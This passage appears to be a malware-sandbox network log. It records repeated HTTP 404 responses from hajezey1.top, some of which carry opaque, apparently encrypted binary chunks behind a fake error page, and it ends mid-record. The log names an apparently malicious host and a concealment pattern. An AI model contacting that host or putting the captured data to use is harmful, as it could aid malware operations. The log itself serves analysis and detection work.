d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 
57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8e 5f 04 25 18 f5 aa 85 b9 a5 13 ea 0e cb 2d e5 00 0c cc 52 a2 bd 71 b6 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82O_%-RqdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 15:55:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 